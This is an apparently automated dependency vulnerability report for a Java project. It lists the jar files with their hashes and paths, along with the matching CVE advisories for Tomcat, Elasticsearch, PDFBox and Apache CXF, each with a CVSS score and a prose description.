Severity:High
CVSS Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The postrm script in the tomcat6 package before 6.0.45+dfsg-1~deb7u3 on Debian wheezy, before 6.0.45+dfsg-1~deb8u1 on Debian jessie, before 6.0.35-1ubuntu3.9 on Ubuntu 12.04 LTS and on Ubuntu 14.04 LTS; the tomcat7 package before 7.0.28-4+deb7u7 on Debian wheezy, before 7.0.56-3+deb8u6 on Debian jessie, before 7.0.52-1ubuntu0.8 on Ubuntu 14.04 LTS, and on Ubuntu 12.04 LTS, 16.04 LTS, and 16.10; and the tomcat8 package before 8.0.14-1+deb8u5 on Debian jessie, before 8.0.32-1ubuntu1.3 on Ubuntu 16.04 LTS, before 8.0.37-1ubuntu0.1 on Ubuntu 16.10, and before 8.0.38-2ubuntu1 on Ubuntu 17.04 might allow local users with access to the tomcat account to gain root privileges via a setgid program in the Catalina directory, as demonstrated by /etc/tomcat8/Catalina/attack.

Vulnerable Software & Versions: (show all)

CVE-2017-12615  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-434 Unrestricted Upload of File with Dangerous Type

When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

Vulnerable Software & Versions: (show all)

CVE-2017-12616  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

When using a VirtualDirContext with Apache Tomcat 7.0.0 to 7.0.80 it was possible to bypass security constraints and/or view the source code of JSPs for resources served by the VirtualDirContext using a specially crafted request.

Vulnerable Software & Versions: (show all)

CVE-2017-12617  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-434 Unrestricted Upload of File with Dangerous Type

When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

Vulnerable Software & Versions: (show all)

CVE-2017-5647  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

A bug in the handling of the pipelined requests in Apache Tomcat 9.0.0.M1 to 9.0.0.M18, 8.5.0 to 8.5.12, 8.0.0.RC1 to 8.0.42, 7.0.0 to 7.0.76, and 6.0.0 to 6.0.52, when send file was used, results in the pipelined request being lost when send file processing of the previous request completed. This could result in responses appearing to be sent for the wrong request. For example, a user agent that sent requests A, B and C could see the correct response for request A, the response for request C for request B and no response for request C.

Vulnerable Software & Versions: (show all)

CVE-2017-5648  

Severity:Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
CWE: CWE-284 Improper Access Control

While investigating bug 60718, it was noticed that some calls to application listeners in Apache Tomcat 9.0.0.M1 to 9.0.0.M17, 8.5.0 to 8.5.11, 8.0.0.RC1 to 8.0.41, and 7.0.0 to 7.0.75 did not use the appropriate facade object. When running an untrusted application under a SecurityManager, it was therefore possible for that untrusted application to retain a reference to the request or response object and thereby access and/or modify information associated with another web application.

Vulnerable Software & Versions: (show all)

CVE-2017-5664  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-254 7PK - Security Features

The error page mechanism of the Java Servlet Specification requires that, when an error occurs and an error page is configured for the error that occurred, the original request and response are forwarded to the error page. This means that the request is presented to the error page with the original HTTP method. If the error page is a static file, expected behaviour is to serve content of the file as if processing a GET request, regardless of the actual HTTP method. The Default Servlet in Apache Tomcat 9.0.0.M1 to 9.0.0.M20, 8.5.0 to 8.5.14, 8.0.0.RC1 to 8.0.43 and 7.0.0 to 7.0.77 did not do this. Depending on the original request this could lead to unexpected and undesirable results for static error pages including, if the DefaultServlet is configured to permit writes, the replacement or removal of the custom error page. Notes for other user provided error pages: (1) Unless explicitly coded otherwise, JSPs ignore the HTTP method. JSPs used as error pages must must ensure that they handle any error dispatch as a GET request, regardless of the actual method. (2) By default, the response generated by a Servlet does depend on the HTTP method. Custom Servlets used as error pages must ensure that they handle any error dispatch as a GET request, regardless of the actual method.

Vulnerable Software & Versions: (show all)

CVE-2017-6056  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-19 Data Processing Errors

It was discovered that a programming error in the processing of HTTPS requests in the Apache Tomcat servlet and JSP engine may result in denial of service via an infinite loop. The denial of service is easily achievable as a consequence of backporting a CVE-2016-6816 fix but not backporting the fix for Tomcat bug 57544. Distributions affected by this backporting issue include Debian (before 7.0.56-3+deb8u8 and 8.0.14-1+deb8u7 in jessie) and Ubuntu.

Vulnerable Software & Versions:

CVE-2018-1304  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-254 7PK - Security Features

The URL pattern of "" (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.

Vulnerable Software & Versions: (show all)

CVE-2018-1305  

Severity:Medium
CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CWE: CWE-284 Improper Access Control

Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.

Vulnerable Software & Versions: (show all)

spatial4j-0.4.1.jar

Description:

 
    Spatial4j is a general purpose spatial / geospatial ASL licensed open-source Java library. It's
    core capabilities are 3-fold: to provide common geospatially-aware shapes, to provide distance
    calculations and other math, and to read shapes in WKT format.
  

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/spatial4j/spatial4j/0.4.1/spatial4j-0.4.1.jar
MD5: 7eafc2e18e82d7a38cb800be2dc9d678
SHA1: 4234d12b1ba4d4b539fb3e29edd948a99539d9eb
SHA256:c467b888bf475495a86a0f4491cb87f80f584e7646cafc7686489f81bce371bc
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.spatial4j:spatial4j:0.4.1  Confidence:Highest

lucene-spatial-4.10.4.jar

Description:

     
  	Spatial Strategies for Apache Lucene
  

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-spatial/4.10.4/lucene-spatial-4.10.4.jar
MD5: e78719c0845be3f2ffc0876ba3aefe57
SHA1: 79ac88a4f91125f47a1a8e28fffae9860e7b3ca6
SHA256:55a5721730d08671c94e80ffb4e1a50dbd2867ea2633aa734eab4166467518a4
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-spatial:4.10.4  Confidence:Highest

antlr-runtime-3.5.jar

Description:

 A framework for constructing recognizers, compilers, and translators from grammatical descriptions containing Java, C#, C++, or Python actions.

File Path: /Users/Kevin/.m2/repository/org/antlr/antlr-runtime/3.5/antlr-runtime-3.5.jar
MD5: aa6d7c8b425df59f5f5bc98c58cfd9fc
SHA1: 0baa82bff19059401e90e1b90020beb9c96305d7
SHA256:7ef52a4e25ea2472a0ae62ae1d5ccaa7ef23be188289ad225fcb8a452a1b738d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.antlr:antlr-runtime:3.5  Confidence:Highest

elasticsearch-1.5.2.jar

Description:

 Elasticsearch - Open Source, Distributed, RESTful Search Engine

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/elasticsearch/elasticsearch/1.5.2/elasticsearch-1.5.2.jar
MD5: 44ad6d04a4e0697b4c26b819a1162bda
SHA1: 47aafc6bf8f23ed8dcbf6a1db174fb0b8e44a8db
SHA256:fb208793e8c77e2ad129df073b9382492fe2297492abbff1e2c50b96c4226053
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2015-4165  

Severity:Medium
CVSS Score: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The snapshot API in Elasticsearch before 1.6.0 when another application exists on the system that can read Lucene files and execute code from them, is accessible by the attacker, and the Java VM on which Elasticsearch is running can write to a location that the other application can read and execute from, allows remote authenticated users to write to and create arbitrary snapshot metadata files, and potentially execute arbitrary code.

Vulnerable Software & Versions:

CVE-2015-5531  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.

Vulnerable Software & Versions:

jempbox-1.8.11.jar

Description:

 
    The Apache JempBox library is an open source Java tool that implements Adobe's XMP(TM)
    specification. JempBox is a subproject of Apache PDFBox.
  

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/pdfbox/jempbox/1.8.11/jempbox-1.8.11.jar
MD5: ea59dc682cd3ed8ce8fb51e14e4693a4
SHA1: e4a930b874f4012314068550c70187e7857c4bd1
SHA256:b50879b87e1e9287831795d417af39d5587fcb2608b6296b7241fb0738aaaf6d
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2016-2175  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Apache PDFBox before 1.8.12 and 2.x before 2.0.1 does not properly initialize the XML parsers, which allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted PDF.

Vulnerable Software & Versions: (show all)

CVE-2018-8036  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

In Apache PDFBox 1.8.0 to 1.8.14 and 2.0.0RC1 to 2.0.10, a carefully crafted (or fuzzed) file can trigger an infinite loop which leads to an out of memory exception in Apache PDFBox's AFMParser.

Vulnerable Software & Versions: (show all)

xmlschema-core-2.2.1.jar

Description:

 Commons XMLSchema is a light weight schema object model that can be used to manipulate or
        generate XML schema.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/ws/xmlschema/xmlschema-core/2.2.1/xmlschema-core-2.2.1.jar
MD5: bab3d98961f361b5e66dbcdadaad1ecf
SHA1: 02eff1f3776590d4c51cc735eab2143c497329f2
SHA256:a2c7a43319c213eea338ac0d84cc1aa1dc37cd458886d618703e8bd91bb51993
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.ws.xmlschema:xmlschema-core:2.2.1  Confidence:Highest
  • cpe: cpe:/a:ws_project:ws:2.2.1  Confidence:Low  

cxf-core-3.1.4.jar

Description:

 Apache CXF Core

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/cxf/cxf-core/3.1.4/cxf-core-3.1.4.jar
MD5: 7c2da0224027b70c6a06f96153b3b315
SHA1: 5387c3daecea4e2b4c7bf74c77e81435f381481e
SHA256:b9db76e21ca79793f9f016490ad4cf086148a716a0427e8d9806fb386e2c145b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.cxf:cxf-core:3.1.4  Confidence:Highest
  • cpe: cpe:/a:apache:cxf:3.1.4  Confidence:Highest  

CVE-2016-6812  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The HTTP transport module in Apache CXF prior to 3.0.12 and 3.1.x prior to 3.1.9 uses FormattedServiceListWriter to provide an HTML page which lists the names and absolute URL addresses of the available service endpoints. The module calculates the base URL using the current HttpServletRequest. The calculated base URL is used by FormattedServiceListWriter to build the service endpoint absolute URLs. If the unexpected matrix parameters have been injected into the request URL then these matrix parameters will find their way back to the client in the services list page which represents an XSS risk to the client.

Vulnerable Software & Versions: (show all)

CVE-2016-8739  

Severity:High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

The JAX-RS module in Apache CXF prior to 3.0.12 and 3.1.x prior to 3.1.9 provides a number of Atom JAX-RS MessageBodyReaders. These readers use Apache Abdera Parser which expands XML entities by default which represents a major XXE risk.

Vulnerable Software & Versions: (show all)

CVE-2017-12624  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-19 Data Processing Errors

Apache CXF supports sending and receiving attachments via either the JAX-WS or JAX-RS specifications. It is possible to craft a message attachment header that could lead to a Denial of Service (DoS) attack on a CXF web service provider. Both JAX-WS and JAX-RS services are vulnerable to this attack. From Apache CXF 3.2.1 and 3.1.14, message attachment headers that are greater than 300 characters will be rejected by default. This value is configurable via the property "attachment-max-header-size".

Vulnerable Software & Versions: (show all)

CVE-2017-3156  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-361 7PK - Time and State

The OAuth2 Hawk and JOSE MAC Validation code in Apache CXF prior to 3.0.13 and 3.1.x prior to 3.1.10 is not using a constant time MAC signature comparison algorithm which may be exploited by sophisticated timing attacks.

Vulnerable Software & Versions: (show all)

CVE-2017-5653  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-20 Improper Input Validation

JAX-RS XML Security streaming clients in Apache CXF before 3.1.11 and 3.0.13 do not validate that the service response was signed or encrypted, which allows remote attackers to spoof servers.

Vulnerable Software & Versions: (show all)

CVE-2017-5656  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-384 Session Fixation

Apache CXF's STSClient before 3.1.11 and 3.0.13 uses a flawed way of caching tokens that are associated with delegation tokens, which means that an attacker could craft a token which would return an identifer corresponding to a cached token for another user.

Vulnerable Software & Versions: (show all)

CVE-2018-8039  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-254 7PK - Security Features

It is possible to configure Apache CXF to use the com.sun.net.ssl implementation via 'System.setProperty("java.protocol.handler.pkgs", "com.sun.net.ssl.internal.www.protocol");'. When this system property is set, CXF uses some reflection to try to make the HostnameVerifier work with the old com.sun.net.ssl.HostnameVerifier interface. However, the default HostnameVerifier implementation in CXF does not implement the method in this interface, and an exception is thrown. However, in Apache CXF prior to 3.2.5 and 3.1.16 the exception is caught in the reflection code and not properly propagated. What this means is that if you are using the com.sun.net.ssl stack with CXF, an error with TLS hostname verification will not be thrown, leaving a CXF client subject to man-in-the-middle attacks.

Vulnerable Software & Versions: (show all)

jboss-jaxrs-api_2.0_spec-1.0.1.Beta1.jar

Description:

 JSR 339: JAX-RS 2.0: The Java(TM) API for RESTful Web Services

License:

Common Development and Distribution License: http://repository.jboss.org/licenses/cddl.txt
GNU General Public License, Version 2 with the Classpath Exception: http://repository.jboss.org/licenses/gpl-2.0-ce.txt
File Path: /Users/Kevin/.m2/repository/org/jboss/spec/javax/ws/rs/jboss-jaxrs-api_2.0_spec/1.0.1.Beta1/jboss-jaxrs-api_2.0_spec-1.0.1.Beta1.jar
MD5: b9eaf10c4d4f47c49ee13e7f8db54f0f
SHA1: 66c0832acaba167c2fd7ee4cbaf212347854d57c
SHA256:1218fa20acae20a0cfb618b452e01c9bf2bfa9cb12fadb308a7a3adbdc45d2b5
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.spec.javax.ws.rs:jboss-jaxrs-api_2.0_spec:1.0.1.Beta1  Confidence:Highest

resteasy-jaxrs-services-3.1.1.Final.jar

File Path: /Users/Kevin/.m2/repository/org/jboss/resteasy/resteasy-jaxrs-services/3.1.1.Final/resteasy-jaxrs-services-3.1.1.Final.jar
MD5: 1119eeca48ad4b20f335875c1ae46632
SHA1: 9137bc3f670d573438ec51eb74e9944790001741
SHA256:7da742585f0c4fd539c93abc1a5d42ab36a7203f4984b83b7ae594c34b30e9d6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.resteasy:resteasy-jaxrs-services:3.1.1.Final  Confidence:Highest

jboss-annotations-api_1.2_spec-1.0.0.Final.jar

Description:

 JSR 250: Common Annotations for the Java(TM) Platform

License:

CDDL or GPLv2 with exceptions: https://glassfish.dev.java.net/public/CDDL+GPL_1_1.html
File Path: /Users/Kevin/.m2/repository/org/jboss/spec/javax/annotation/jboss-annotations-api_1.2_spec/1.0.0.Final/jboss-annotations-api_1.2_spec-1.0.0.Final.jar
MD5: 5f6032592ce12619333ee3330cdebf08
SHA1: 6d7ff02a645227876ed550900d32d618b8f0d556
SHA256:bb979cac95ef2748bc85d4b8151bef88b9a203d03068fbe799c6e6162c950780
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.spec.javax.annotation:jboss-annotations-api_1.2_spec:1.0.0.Final  Confidence:Highest

activation-1.1.1.jar

Description:

 The JavaBeans(TM) Activation Framework is used by the JavaMail(TM) API to manage MIME data

License:

COMMON DEVELOPMENT AND DISTRIBUTION LICENSE (CDDL) Version 1.0: https://glassfish.dev.java.net/public/CDDLv1.0.html
File Path: /Users/Kevin/.m2/repository/javax/activation/activation/1.1.1/activation-1.1.1.jar
MD5: 46a37512971d8eca81c3fcf245bf07d2
SHA1: 485de3a253e23f645037828c07f1d7f1af40763a
SHA256:ae475120e9fcd99b4b00b38329bd61cdc5eb754eee03fe66c01f50e137724f99
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.activation:activation:1.1.1  Confidence:Highest

jcip-annotations-1.0.jar

File Path: /Users/Kevin/.m2/repository/net/jcip/jcip-annotations/1.0/jcip-annotations-1.0.jar
MD5: 9d5272954896c5a5d234f66b7372b17a
SHA1: afba4942caaeaf46aab0b976afd57cc7c181467e
SHA256:be5805392060c71474bf6c9a67a099471274d30b83eef84bfc4e0889a4f1dcc0
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.jcip:jcip-annotations:1.0  Confidence:Highest

jboss-logging-3.3.0.Final.jar

Description:

 The JBoss Logging Framework

License:

Apache License, version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/jboss/logging/jboss-logging/3.3.0.Final/jboss-logging-3.3.0.Final.jar
MD5: bc11af4b8ce7138cdc79b7ba8561638c
SHA1: 3616bb87707910296e2c195dc016287080bba5af
SHA256:e0e0595e7f70c464609095aef9e47a8484e05f2f621c0aa5081c18e3db2d498c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.logging:jboss-logging:3.3.0.Final  Confidence:Highest

resteasy-jaxrs-3.1.1.Final.jar

File Path: /Users/Kevin/.m2/repository/org/jboss/resteasy/resteasy-jaxrs/3.1.1.Final/resteasy-jaxrs-3.1.1.Final.jar
MD5: 34f453ada08efeabbc2f83b3dae14f7f
SHA1: 8c2d93394dbb42b418be4579a49460883b3d3aef
SHA256:dde3dff1cab60d94cbc7db62683991ffbfb07188c4c7c6397e79975ccbc1033a
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.resteasy:resteasy-jaxrs:3.1.1.Final  Confidence:Highest

jna-4.0.0.jar: jnidispatch.dll

File Path: /Users/Kevin/.m2/repository/net/java/dev/jna/jna/4.0.0/jna-4.0.0.jar/com/sun/jna/win32-x86/jnidispatch.dll
MD5: cc120b15f4fcdafe80c495c5c648319f
SHA1: 75aad2852aab97bf068c71c10e60b1c96bcadc1c
SHA256:aac8facb9f50ef401a610eb40232f324ae8cc59671c48298742bf0fec3b8967f
Referenced In Project/Scope:trial:compile

Identifiers

  • None

jna-4.0.0.jar: jnidispatch.dll

File Path: /Users/Kevin/.m2/repository/net/java/dev/jna/jna/4.0.0/jna-4.0.0.jar/com/sun/jna/w32ce-arm/jnidispatch.dll
MD5: 57697cbdd321ae7d06f5da04e821f908
SHA1: 67167f2b2fce8db5f9f64a372b0da54730d3ee51
SHA256:361e173e6e50cb1bf8b7fab38c1ff99686ea819e58ee30348e7756cb0418a9f6
Referenced In Project/Scope:trial:compile

Identifiers

  • None

jna-4.0.0.jar: jnidispatch.dll

File Path: /Users/Kevin/.m2/repository/net/java/dev/jna/jna/4.0.0/jna-4.0.0.jar/com/sun/jna/win32-x86-64/jnidispatch.dll
MD5: 06b2f1f909d2436dff20d7a668ef26a9
SHA1: bd1bdda9a91f3b0d9067e323f7394bef933f81f6
SHA256:e7864cb5509990ccf3f3d8a2ad1eaf41491ebb82df35408ee79957385d8355b3
Referenced In Project/Scope:trial:compile

Identifiers

  • None

jansi-1.11.jar: jansi.dll

File Path: /Users/Kevin/.m2/repository/org/fusesource/jansi/jansi/1.11/jansi-1.11.jar/META-INF/native/windows32/jansi.dll
MD5: 1e56641bb68937f8e2020cbff5d04a08
SHA1: 97f6e12599bb5848867b9762184d055ed918ab2a
SHA256:0f59ff32a7c70e00a580d893de42ffaf48d0242b4d6251792666919b10ac3cd4
Referenced In Project/Scope:trial:compile

Identifiers

  • None

jansi-1.11.jar: jansi.dll

File Path: /Users/Kevin/.m2/repository/org/fusesource/jansi/jansi/1.11/jansi-1.11.jar/META-INF/native/windows64/jansi.dll
MD5: fd3a20891286c958103f3ea07174cd3c
SHA1: 829195c9e338d5725cf304ae33fc209db53884eb
SHA256:c33505a7c1fb847c03329a4f0e4b3c5cebac3a3604133d797d09172de25e3978
Referenced In Project/Scope:trial:compile

Identifiers

  • None

plexus-utils-1.5.4.jar (shaded: org.codehaus.plexus:plexus-interpolation:1.0)

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-utils/1.5.4/plexus-utils-1.5.4.jar/META-INF/maven/org.codehaus.plexus/plexus-interpolation/pom.xml
MD5: 61795135733295c9aa438fda7b923db8
SHA1: 1074eabfbcbfb0decfe6f9ed0541668e114b9311
SHA256:0749c012cf2271d466eb9aef9acc2e84c38a2a94d545e7108fd15302b21a1b82
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-interpolation:1.0  Confidence:High

netty-common-4.1.8.Final.jar (shaded: org.jctools:jctools-core:1.2.1)

Description:

 Java Concurrency Tools Core Library

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/io/netty/netty-common/4.1.8.Final/netty-common-4.1.8.Final.jar/META-INF/maven/org.jctools/jctools-core/pom.xml
MD5: b104e807eab8c5ec728e4440814b4e86
SHA1: 890d905133422e4be5df7cffa81e7dd9c5336d7e
SHA256:12444dc7be1ea1e1b5361f4bb9fb9ae04197b64846c3ce915b363cfafbcdf8d9
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jctools:jctools-core:1.2.1  Confidence:High

jansi-1.11.jar (shaded: org.fusesource.hawtjni:hawtjni-runtime:1.8)

Description:

 The API that projects using HawtJNI should build against.

File Path: /Users/Kevin/.m2/repository/org/fusesource/jansi/jansi/1.11/jansi-1.11.jar/META-INF/maven/org.fusesource.hawtjni/hawtjni-runtime/pom.xml
MD5: 9343dc158b5894310f26732ebb2b73ee
SHA1: 14df4655274e472909050661f8e9ed98a28b6721
SHA256:13ecedc2275242731df0cb4b491cb79cacb36f945ff402677b56680d7321a15f
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.fusesource.hawtjni:hawtjni-runtime:1.8  Confidence:High

jansi-1.11.jar (shaded: org.fusesource.jansi:jansi-native:1.5)

Description:

 Jansi is a java library for generating and interpreting ANSI escape sequences.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/fusesource/jansi/jansi/1.11/jansi-1.11.jar/META-INF/maven/org.fusesource.jansi/jansi-native/pom.xml
MD5: 1bbb551ce034727cd799619954437ab5
SHA1: 0177ae5fbf3b24c3e9adb94d98e29213259a8bc6
SHA256:e6fd759cbf831b6df571733eb38cfbee690d52c2e205248a76690efd24c8e036
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:id:id-software:1.5  Confidence:Low  
  • maven: org.fusesource.jansi:jansi-native:1.5  Confidence:High

jansi-1.11.jar (shaded: org.fusesource.jansi:jansi:1.11)

Description:

 Jansi is a java library for generating and interpreting ANSI escape sequences.

File Path: /Users/Kevin/.m2/repository/org/fusesource/jansi/jansi/1.11/jansi-1.11.jar/META-INF/maven/org.fusesource.jansi/jansi/pom.xml
MD5: 18c6eba91ac7aa1a27324b482dca06d5
SHA1: 3aea48c5e47064eec9903f4a14e5acee8fe345d8
SHA256:fba16891bde4264829c63dcddbed8832b14537caeb25d10a90ee0fba934a552d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.fusesource.jansi:jansi:1.11  Confidence:High
  • cpe: cpe:/a:id:id-software:1.11  Confidence:Low  

htrace-core-3.2.0-incubating.jar (shaded: commons-logging:commons-logging:1.1.1)

Description:

 Commons Logging is a thin adapter allowing configurable bridging to other,
    well known logging systems.

File Path: /Users/Kevin/.m2/repository/org/apache/htrace/htrace-core/3.2.0-incubating/htrace-core-3.2.0-incubating.jar/META-INF/maven/commons-logging/commons-logging/pom.xml
MD5: 976d812430b8246deeaf2ea54610f263
SHA1: 76672afb562b9e903674ad3a544cdf2092f1faa3
SHA256:d0f2e16d054e8bb97add9ca26525eb2346f692809fcd2a28787da8ceb3c35ee8
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-logging:commons-logging:1.1.1  Confidence:High


This report contains data retrieved from the National Vulnerability Database.
This report may contain data retrieved from the Node Security Platform.